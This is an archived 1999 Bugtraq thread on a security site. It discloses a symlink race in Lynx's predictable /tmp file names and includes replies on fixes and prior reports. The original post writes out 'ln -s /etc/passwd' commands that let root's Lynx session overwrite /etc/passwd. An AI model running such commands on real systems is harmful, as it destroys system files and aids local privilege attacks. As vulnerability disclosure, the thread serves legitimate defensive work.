what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

lynxtmp.txt

lynxtmp.txt
Posted Aug 17, 1999

Lynx /tmp bug involving symlinks can lead to local root compromise.

tags | exploit, local, root
SHA-256 | a6b28927f7725cb5e7841faa2bb5111e32452c91664008bad5d0baa2ce7ea8df
Download | Favorite | View

lynxtmp.txt

Change Mirror Download
Date: Tue, 9 Feb 1999 20:57:30 -0500
From: Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
To: BUGTRAQ@netspace.org
Subject: Lynx /tmp problem

Hi Aleph,
please filter this if already posted....
------

Hello....

I have found a bug in Lynx all versions, except the latest stable
release...

lynx create temporary files in /tmp in this way....


L[num proc]-xTMP.html

where

[num proc] is the proc number in the machine
x is a number from 0 to 9

if i run lynx like any user, for example root we see this

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW   0:06 (bash)
   94   4 S    0:05 -bash
   95   5 SW   0:06 (bash)
 3867  a3 S    0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
 3870   3 SW   0:02 (ssh)
 3894   4 T    0:00 lynx
 3898   4 R    0:00 ps

then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

if i make a symlink
>from all of this files to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd  L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-9TMP.html

and now root (in this example) try to download a file, or press the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...

for example i got this in my system...

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
  <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


like you see, the file is lost now...

this bug is lynx specific, so all OS are vulnerables..

Fix, upgrade to the latest lynx version, i have checked it, and it appear
to use a L[proc num]-xTMP.html where x is from 0 to ???...

i hope it is already fixed, creating 100 symlinks are not to hard :)

the lynx team know this yet.

by...


Juan Diego

---------------------------------------------------------------------------

Date: Thu, 11 Feb 1999 12:55:41 -0700
From: Theo de Raadt <deraadt@CVS.OPENBSD.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem

> this bug is lynx specific, so all OS are vulnerables..

OpenBSD ships with an integrated version of lynx.  Our version has
tweaks to avoid this issue.

We've brought this issue up with the lynx people before.  They do not
appear to give a damn.

That said, from reading the code I can see why they might not care --
this problem is going to be a complete nightmare to fix.  Lynx's
handling of /tmp is wrought with many races, and the code is pasta.

---------------------------------------------------------------------------

Date: Fri, 12 Feb 1999 08:47:00 +0000
From: Glynn Clements <glynn@SENSEI.CO.UK>
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem

Juan Diego Bolanos wrote:

> Hi Aleph,
> please filter this if already posted....

The fact that lynx has potential /tmp problems was discussed last
March:

        From: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
        Subject:      Another day, another race - lynx 2.7.1
        Date:   Tue, 17 Mar 1998 15:39:58 +0100
        Message-ID: <Pine.LNX.3.96.980317152338.14878A-100000@genome>

> I have found a bug in Lynx all versions, except the latest stable
> release...
>
> lynx create temporary files in /tmp in this way....

[details of your average /tmp problem snipped].

>From the INSTALLATION file:

    The environment variable "LYNX_TEMP_SPACE", if set, will override the
    default path prefix for temporary files that was defined via the constant
    "TEMP_SPACE" in userdefs.h.  See userdefs.h for more information.

--
Glynn Clements <glynn@sensei.co.uk>

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close